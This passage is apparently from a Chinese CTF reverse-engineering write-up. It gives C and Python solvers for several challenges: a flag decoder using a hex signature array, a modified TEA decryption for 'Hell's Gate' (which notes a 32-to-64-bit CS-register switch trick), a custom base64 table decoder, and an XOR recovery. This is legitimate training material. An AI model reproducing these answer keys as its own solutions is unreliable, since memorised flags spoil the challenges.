0x61, 0x66, 0x31, 0x66, 0x35, 0x61, 0x31, 0x31, 0x66, 0x37,
0x37, 0x39, 0x65, 0x63, 0x62, 0x65, 0x30, 0x34, 0x64, 0x31,
0x62, 0x37, 0x34, 0x64, 0x35, 0x33, 0x66, 0x35, 0x38, 0x33,
0x35, 0x65, 0x30, 0x31, 0x31, 0x32, 0x32, 0x32, 0x31, 0x35,
0x35, 0x61, 0x35, 0x36, 0x66, 0x39, 0x37, 0x65, 0x30, 0x30,
0x64, 0x37, 0x35, 0x33, 0x37, 0x34, 0x63, 0x64, 0x39, 0x33,
0x30, 0x38, 0x30, 0x64, 0x66, 0x61, 0x30, 0x38, 0x37, 0x63,
0x64, 0x33, 0x35, 0x36, 0x61, 0x39, 0x39, 0x66, 0x65, 0x31,
0x65, 0x65, 0x62, 0x66, 0x35, 0x64, 0x36, 0x64, 0x35, 0x65,
0x33, 0x31, 0x38, 0x34, 0x36, 0x61, 0x61, 0x64, 0x35, 0x32,
0x35, 0x32, 0x63, 0x33, 0x61, 0x31, 0x37, 0x61, 0x34, 0x36,
0x35, 0x36, 0x65, 0x32, 0x65, 0x32, 0x31, 0x30, 0x63, 0x65,
0x31, 0x63, 0x37, 0x61, 0x61, 0x34, 0x64, 0x31, 0x34, 0x37,
0x66, 0x62, 0x38, 0x63, 0x66, 0x34, 0x34, 0x30, 0x61, 0x35,
0x30, 0x61, 0x64, 0x64, 0x36, 0x31, 0x62, 0x62, 0x62, 0x32,
0x65, 0x63, 0x32, 0x39, 0x39, 0x61, 0x32, 0x65, 0x30, 0x64,
0x61, 0x62, 0x30, 0x62, 0x34, 0x35, 0x30, 0x34, 0x37, 0x39,
0x36, 0x61, 0x63, 0x33, 0x61, 0x38, 0x39, 0x39, 0x64, 0x61,
0x35, 0x35, 0x33, 0x61, 0x62, 0x31, 0x64, 0x38, 0x33, 0x35,
0x37, 0x36, 0x36, 0x39, 0x31, 0x61, 0x62, 0x32, 0x33, 0x34,
0x30, 0x39, 0x64, 0x31, 0x38, 0x33, 0x39, 0x38, 0x30, 0x31,
0x34, 0x62, 0x33, 0x62, 0x35, 0x65, 0x61, 0x66, 0x31, 0x32,
0x65, 0x38, 0x33, 0x66, 0x34, 0x64, 0x39, 0x39, 0x61, 0x61,
0x30, 0x39, 0x65, 0x31, 0x65, 0x34, 0x65, 0x34, 0x63, 0x61,
0x65, 0x31, 0x33, 0x33, 0x35, 0x33, 0x30, 0x37, 0x33, 0x30,
0x63, 0x31, 0x31, 0x33, 0x33, 0x64, 0x61, 0x32, 0x62, 0x33,
0x64, 0x65, 0x65, 0x33, 0x37, 0x62, 0x35, 0x38, 0x65, 0x62,
0x31, 0x61, 0x35, 0x37, 0x39, 0x35, 0x62, 0x32, 0x32, 0x31,
0x65, 0x63, 0x35, 0x61, 0x38, 0x38, 0x33, 0x30, 0x37, 0x33,
0x31, 0x61, 0x34, 0x31, 0x31, 0x36, 0x37, 0x64, 0x32, 0x39,
0x35, 0x66, 0x39, 0x65, 0x31, 0x62, 0x30, 0x32, 0x30, 0x33,
0x30, 0x31, 0x30, 0x30, 0x30, 0x31, 0x33, 0x30, 0x30, 0x64,
0x30, 0x36, 0x30, 0x39, 0x32, 0x61, 0x38, 0x36, 0x34, 0x38,
0x38, 0x36, 0x66, 0x37, 0x30, 0x64, 0x30, 0x31, 0x30, 0x31,
0x30, 0x35, 0x30, 0x35, 0x30, 0x30, 0x30, 0x33, 0x38, 0x32,
0x30, 0x31, 0x30, 0x31, 0x30, 0x30, 0x30, 0x65, 0x34, 0x37,
0x34, 0x30, 0x32, 0x33, 0x35, 0x65, 0x39, 0x63, 0x66, 0x32,
0x62, 0x65, 0x33, 0x33, 0x64, 0x65, 0x33, 0x65, 0x30, 0x36,
0x64, 0x37, 0x37, 0x37, 0x31, 0x33, 0x39, 0x63, 0x62, 0x62,
0x63, 0x35, 0x63, 0x66, 0x30, 0x36, 0x32, 0x32, 0x32, 0x38,
0x35, 0x63, 0x31, 0x37, 0x64, 0x61, 0x30, 0x34, 0x36, 0x39,
0x37, 0x62, 0x38, 0x30, 0x36, 0x37, 0x33, 0x31, 0x38, 0x61,
0x61, 0x66, 0x38, 0x64, 0x66, 0x30, 0x66, 0x62, 0x62, 0x34,
0x64, 0x33, 0x31, 0x36, 0x36, 0x66, 0x32, 0x39, 0x33, 0x65,
0x61, 0x31, 0x35, 0x61, 0x61, 0x32, 0x35, 0x39, 0x32, 0x66,
0x30, 0x36, 0x65, 0x62, 0x36, 0x39, 0x32, 0x39, 0x61, 0x66,
0x30, 0x36, 0x33, 0x37, 0x32, 0x32, 0x61, 0x63, 0x39, 0x66,
0x33, 0x30, 0x61, 0x64, 0x38, 0x35, 0x65, 0x32, 0x63, 0x30,
0x38, 0x37, 0x35, 0x36, 0x34, 0x39, 0x33, 0x31, 0x64, 0x36,
0x61, 0x63, 0x36, 0x35, 0x66, 0x63, 0x64, 0x35, 0x66, 0x62,
0x63, 0x38, 0x36, 0x34, 0x62, 0x33, 0x64, 0x63, 0x39, 0x38,
0x34, 0x31, 0x65, 0x30, 0x33, 0x39, 0x63, 0x36, 0x65, 0x31,
0x64, 0x35, 0x66, 0x62, 0x63, 0x35, 0x63, 0x32, 0x66, 0x38,
0x61, 0x64, 0x66, 0x39, 0x30, 0x61, 0x35, 0x34, 0x37, 0x62,
0x63, 0x34, 0x65, 0x62, 0x63, 0x30, 0x37, 0x64, 0x33, 0x38,
0x37, 0x39, 0x31, 0x34, 0x64, 0x62, 0x32, 0x34, 0x34, 0x35,
0x31, 0x63, 0x32, 0x63, 0x63, 0x38, 0x39, 0x39, 0x32, 0x35,
0x33, 0x35, 0x39, 0x62, 0x64, 0x33, 0x62, 0x62, 0x30, 0x37,
0x35, 0x30, 0x63, 0x37, 0x61, 0x61, 0x62, 0x66, 0x39, 0x64,
0x37, 0x34, 0x33, 0x62, 0x31, 0x38, 0x39, 0x33, 0x65, 0x39,
0x38, 0x62, 0x62, 0x63, 0x38, 0x66, 0x66, 0x37, 0x34, 0x62,
0x32, 0x34, 0x66, 0x63, 0x30, 0x62, 0x34, 0x62, 0x65, 0x32,
0x64, 0x62, 0x61, 0x61, 0x66, 0x31, 0x63, 0x39, 0x31, 0x37,
0x62, 0x62, 0x61, 0x30, 0x31, 0x34, 0x39, 0x36, 0x64, 0x30,
0x36, 0x31, 0x37, 0x66, 0x66, 0x63, 0x33, 0x61, 0x34, 0x61,
0x38, 0x62, 0x37, 0x61, 0x36, 0x65, 0x37, 0x39, 0x61, 0x33,
0x30, 0x33, 0x36, 0x32, 0x39, 0x38, 0x61, 0x36, 0x65, 0x62,
0x66, 0x35, 0x37, 0x62, 0x62, 0x30, 0x30, 0x30, 0x30, 0x31,
0x65, 0x34, 0x33, 0x61, 0x30, 0x62, 0x32, 0x34, 0x32, 0x38,
0x36, 0x34, 0x65, 0x65, 0x62, 0x62, 0x30, 0x66, 0x63, 0x65,
0x63, 0x39, 0x65, 0x33, 0x32, 0x33, 0x31, 0x34, 0x34, 0x64,
0x34, 0x34, 0x34, 0x37, 0x63, 0x38, 0x37, 0x38, 0x34, 0x33,
0x30, 0x66, 0x31, 0x38, 0x65, 0x36, 0x65, 0x33, 0x35, 0x38,
0x61, 0x64, 0x39, 0x37, 0x35, 0x36, 0x36, 0x66, 0x61, 0x30,
0x34, 0x64, 0x31, 0x66, 0x30, 0x37, 0x62, 0x31, 0x37, 0x31,
0x63, 0x31, 0x34, 0x37, 0x36, 0x63, 0x39, 0x61, 0x66, 0x35,
0x61, 0x31, 0x65, 0x62, 0x61, 0x30, 0x62, 0x66, 0x36, 0x36,
0x31, 0x36, 0x65, 0x32, 0x31, 0x39, 0x63, 0x30, 0x62, 0x39,
0x65, 0x31, 0x32, 0x39, 0x39, 0x64, 0x30, 0x39, 0x66, 0x65,
0x63, 0x64, 0x65, 0x64, 0x32, 0x34, 0x61, 0x38, 0x38, 0x30,
0x33, 0x39, 0x37, 0x66, 0x39, 0x32, 0x65, 0x30, 0x66, 0x39,
0x39, 0x64, 0x38, 0x39, 0x35, 0x31, 0x32, 0x32, 0x38, 0x63,
0x37, 0x37, 0x37, 0x30, 0x63, 0x31, 0x38, 0x34, 0x66, 0x64,
0x37, 0x37, 0x61, 0x64, 0x66, 0x66, 0x39, 0x34, 0x33, 0x62,
0x66, 0x63, 0x38, 0x62, 0x36, 0x61, 0x61, 0x35, 0x32, 0x34,
0x63, 0x35, 0x66, 0x30, 0x61, 0x36, 0x64, 0x37, 0x36, 0x38,
0x36, 0x66, 0x65, 0x33, 0x35, 0x34, 0x38, 0x36};
unsigned char flag[] =
{
0xCA, 0xEB, 0x4A, 0x8A, 0x68, 0xE1, 0xA1, 0xEB, 0xE1, 0xEE,
0x6B, 0x84, 0xA2, 0x6D, 0x49, 0xC8, 0x8E, 0x0E, 0xCC, 0xE9,
0x45, 0xCF, 0x23, 0xCC, 0xC5, 0x4C, 0x0C, 0x85, 0xCF, 0xA9,
0x8C, 0xF6, 0xE6, 0xD6, 0x26, 0x6D, 0xAC, 0x0C, 0xAC, 0x77,
0xE0, 0x64};
for(i=0;i<42;i++){
flag[i] = ((flag[i] >> 5) | (flag[i] << 3)) & 0xff;
}
for(i=0;i<42;i++){
flag[i] = flag[i] ^ (sign[327+27*i] + i);
printf("%c", flag[i]);
}
return 0;
}
Hell’s Gate
首先主动触发异常处理程序,然后到达真实的check函数,其中调用了很多奇怪的函数。
通过改cs寄存器,从32位代码执行环境转换到64位。
发现就是个TEA,不过改了下delta。
#include<windows.h>
#include<stdio.h>
#include<stdlib.h>
void decrypt(unsigned int * v, unsigned int * k)
{
unsigned int y=v[0],z=v[1],sum=0x879379e0,i;
unsigned int delta=0xb879379e;
unsigned int a=k[0],b=k[1],c=k[2],d=k[3];
for(i=0;i<16;i++)
{
z-=((y<<4)+c)^(y+sum)^((y>>5)+d);
y-=((z<<4)+a)^(z+sum)^((z>>5)+b);
sum-=delta;
}
v[0]=y;
v[1]=z;
}
int main()
{
unsigned int data[8]={0x2C94650B,0x78494E9E,0x0E7FACF44,0x48F9DBFB,0x547BB145,0x925D2542,0x69A9F4C4,0x9A96A1D8};
unsigned int key[4]={0x12345678,0x87654321,0x13243546,0x64534231};
for(int i=0;i<8;i+=2)
{
unsigned int *ptr=&(data[i]);
decrypt(ptr,key);
unsigned char *o=(unsigned char *)ptr;
for(int j=0;j<8;j++)
printf("%c",o[j]);
}
}
mod
有花指令,去掉即可。
有点类似base64,也是三个字节变换成64个字节,然后表代换。
base64_tbl="ABCDFEGH1JKLRSTMNP0VWQUXY2a8cdefijklmnopghwxyqrstuvzOIZ34567b9+/"
enc="2aYcdfL2fS1BTMMF1RSeMTTASS1OJ8RHTJdBYJ2STJfNMSMAYcKUJddp"
data=[]
for c in enc:
data.append(base64_tbl.find(c))
ptr=0
flag=""
while ptr<len(data):
chr0=((data[ptr]<<2)&0xC0)|(data[ptr+1]&0x3)|((data[ptr+2]<<2)&0x30)|(((data[ptr+3]<<2)&0xC0)>>4)
chr1=((data[ptr]<<2)&0x30)|((data[ptr+1]<<2)&0xC0)|(data[ptr+2]&0x3)|(((data[ptr+3]<<2)&0x30)>>2)
chr2=(data[ptr]&0x3)|((data[ptr+1]<<2)&0x30)|((data[ptr+2]<<2)&0xC0)|((data[ptr+3]<<2)&0xC)
flag+=chr(chr0)+chr(chr1)+chr(chr2)
ptr+=4
print(flag)
ooo
将前4位与“flag”异或,发现异或的值是等差数列,公差为256。
### mod
x=[
6,
268,
513,
775,
1051,
1361,
1619,
1798,
2131,
2389,
2646,
2902,
3155,
3405,
3669,
3920,
4097,
4436,
4685,
4948,
5207,
5463,
5634,
5965,
6226,
6487,
6744,
6914,
7245,
7426,
7767,
8017,
8273,
8528,
8786,
9046,
9222,
9478,
9815,
9985,
10244,
10525]
a1=96
a=[]
for i in range(0,42):
a.append(a1+256*i)
for i in range(0,42):
print(chr(x[i]^a[i]),end="")